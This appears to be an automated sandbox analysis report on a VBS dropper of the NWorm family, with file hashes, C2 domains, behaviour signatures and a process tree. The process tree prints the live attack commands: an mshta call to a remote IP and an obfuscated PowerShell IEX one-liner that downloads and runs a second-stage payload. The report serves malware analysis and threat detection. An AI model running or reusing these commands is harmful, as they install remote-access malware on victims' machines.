Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    15-02-2022 02:11

General

  • Target

    STJQYIULUDCELUOGYJKBGX.vbs

  • Size

    6KB

  • MD5

    74f58ac31a1f70bb4c704f31074882c0

  • SHA1

    247ab701feff34cef747bf8e388b3639b8af9084

  • SHA256

    7c1862829839b836c1c21bb92e65316c1148efefab2028eccf91231bc50fe2c2

  • SHA512

    14e0e9a5f63e6b3807378a297146ba08ebdfbc73ff3ed27741761b22d53d3be59bcaa5ff2e06caa6d8d6f2e9d0f6fef9c530260d80fb61d50ea8ad904d990169

Score
10/10

Malware Config

Extracted

Family

nworm

Version

v0.3.8

C2

nyanmoj.duckdns.org:5057

moneyhope81.duckdns.org:5057

Mutex

cb2d3cba

Signatures

  • NWorm

    A TrickBot module used to propagate to vulnerable domain controllers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 56 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STJQYIULUDCELUOGYJKBGX.vbs"
    1⤵
      PID:1788
    • C:\Windows\system32\msHta.exe
      msHta.exe HttP://3.22.248.2/qw/EncGQE.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HQPIRTNLNVVNENVTOSFOQPX = '[\6$@5=3#6_&86}<!6#+@86y\6$@5=3#6_&86}<!6#+@86t^($+0)+*\]^26/7=-57)$8[#9@-!=-\{&9]2/5!995](.IO.\6$@5=3#6_&86}<!6#+@86t\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$[#9@-!=-\{&9]2/5!995](\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$d^($+0)+*\]^26/7=-57)$8\)6)6%-\+27-+}/$$$+)=)]'.Replace('\6$@5=3#6_&86}<!6#+@86','S').Replace('^($+0)+*\]^26/7=-57)$8','E').Replace('\)6)6%-\+27-+}/$$$+)=)','R').Replace('=4_14%)*6(=8+{&_%7{17$','A').Replace('[#9@-!=-\{&9]2/5!995](','M');$HRTEUQOOTFTZLQAZFWAURIJ = ($HQPIRTNLNVVNENVTOSFOQPX -Join '')|&('I'+'EX');$HZSOPPIHHQLRYYEQVBEDSUX = '[1$56\-<^}+$099--+0}#_/y1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#=#\%+0[^=2*8#}8($/-$/}m.N=#\%+0[^=2*8#}8($/-$/}}({+@((<0%\3==8$3+)0<#.W=#\%+0[^=2*8#}8($/-$/}bR=#\%+0[^=2*8#}8($/-$/}qu=#\%+0[^=2*8#}8($/-$/}1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#]'.Replace('1$56\-<^}+$099--+0}#_/','S').Replace('=#\%+0[^=2*8#}8($/-$/}','E').Replace('}({+@((<0%\3==8$3+)0<#','T');$HOHVKHWHGAYHFLLBDNQFERO = ($HZSOPPIHHQLRYYEQVBEDSUX -Join '')|&('I'+'EX');$HUXHSFRXTJGUNPZKBAKQKDB = '7-0=!*[88^$]!&^-<0=!40r+6^1809#8_[3#9!*7&%/(}a8&_{*!#&(*%\348!!*/}8{+6^1809#8_[3#9!*7&%/(}'.Replace('7-0=!*[88^$]!&^-<0=!40','C').Replace('+6^1809#8_[3#9!*7&%/(}','E').Replace('8&_{*!#&(*%\348!!*/}8{','T');$HDGSFNUEFWTDNIWVCKPZGAN = '1847$$37[6=[//!%=/1+29)^67!]6\<-*%^$_!]<%#=9tR)^67!]6\<-*%^$_!]<%#=97759<]}1}&=-))27371/7/pon7759<]}1}&=-))27371/7/)^67!]6\<-*%^$_!]<%#=9'.Replace('1847$$37[6=[//!%=/1+29','G').Replace(')^67!]6\<-*%^$_!]<%#=9','E').Replace('7759<]}1}&=-))27371/7/','S');$HPLQTYQUTWSSOTBNQTGWCJW = 'G=-{19_]8@-38\_}33$<}92t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2pon0^%\{#218_*!9/22]03/\2=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}92am'.Replace('0^%\{#218_*!9/22]03/\2','S').Replace('=-{19_]8@-38\_}33$<}92','E').Replace('60!3610=]928-+4{4@5<9{','R');$HIPJLQVQFSETDTUGXWWOVEN = '821#8{8)<4-+*%_7^[/_]}6_\4<00(_0{#202{{&^89/a^34)4\]92(]$[!%5}\0#$%To6_\4<00(_0{#202{{&^89/n^34)4\]92(]$[!%5}\0#$%'.Replace('821#8{8)<4-+*%_7^[/_]}','R').Replace('6_\4<00(_0{#202{{&^89/','E').Replace('^34)4\]92(]$[!%5}\0#$%','D');&('I'+'EX')($HRTEUQOOTFTZLQAZFWAURIJ::new($HOHVKHWHGAYHFLLBDNQFERO::$HUXHSFRXTJGUNPZKBAKQKDB('HttP://3.22.248.2/qw/Ps1HJ.txt').$HDGSFNUEFWTDNIWVCKPZGAN().$HPLQTYQUTWSSOTBNQTGWCJW()).$HIPJLQVQFSETDTUGXWWOVEN())
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          3⤵
            PID:704
      • C:\Windows\system32\MusNotifyIcon.exe
        %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
        1⤵
        • Checks processor information in registry
        PID:936
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -p
        1⤵
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        PID:2864
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        1⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:3796

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/704-143-0x0000000000400000-0x000000000040A000-memory.dmp

        Filesize

        40KB

      • memory/704-148-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

        Filesize

        4KB

      • memory/704-149-0x00000000097A0000-0x00000000097A1000-memory.dmp

        Filesize

        4KB

      • memory/704-150-0x00000000099B0000-0x0000000009A4C000-memory.dmp

        Filesize

        624KB

      • memory/704-151-0x000000000A000000-0x000000000A5A4000-memory.dmp

        Filesize

        5.6MB

      • memory/704-152-0x0000000009AC0000-0x0000000009B26000-memory.dmp

        Filesize

        408KB

      • memory/2036-135-0x00000215E0ED0000-0x00000215E0EF2000-memory.dmp

        Filesize

        136KB

      • memory/2036-136-0x00007FF9E3A93000-0x00007FF9E3A95000-memory.dmp

        Filesize

        8KB

      • memory/2036-137-0x00000215F93D0000-0x00000215F93D2000-memory.dmp

        Filesize

        8KB

      • memory/2036-138-0x00000215F93D3000-0x00000215F93D5000-memory.dmp

        Filesize

        8KB

      • memory/2036-141-0x00000215F93D6000-0x00000215F93D8000-memory.dmp

        Filesize

        8KB

      • memory/2036-142-0x00000215F9390000-0x00000215F93AA000-memory.dmp

        Filesize

        104KB